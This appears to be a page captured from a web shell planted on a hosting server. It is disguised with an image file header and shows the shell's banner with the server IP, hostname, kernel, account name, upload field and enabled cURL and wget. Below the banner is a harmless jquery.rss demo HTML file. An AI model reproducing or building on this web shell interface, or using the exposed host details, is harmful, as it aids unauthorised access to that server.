����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 216.73.216.178 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/www/public/builder/templates/developer/assets/plugins/_jquery-rss/ |
Upload File : |
<!DOCTYPE html> <html> <head> <title>jquery.rss example</title> <script src="lib/jquery-1.6.4.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.8.4/moment.min.js"></script> <script src="src/jquery.rss.js"></script> <script> jQuery(function($) { $("#rss-feeds").rss("http://feeds.feedburner.com/dawanda", { limit: 15, effect: 'slideFastSynced' }) }) </script> <style type="text/css"> body { font-family: Arial, Verdana, Trebuchet MS, Helvetica, lucida grande, "sans-serif"; font-size: 12px; } body > div { margin: 0px auto; width: 800px; } a { color: #37D; text-decoration: none; } a:hover { text-decoration: underline; } ul { list-style-type: none; margin: 0px; padding: 0px; } li { padding: 10px; border-top: 1px dashed #AAA; background-color: #EFEFEF; } li:first-child { border-top: none; } li:nth-child(2n) { background-color: white; } </style> </head> <body> <div> <h1>jquery.rss example</h1> <div id="rss-feeds"></div> </div> </body> </html>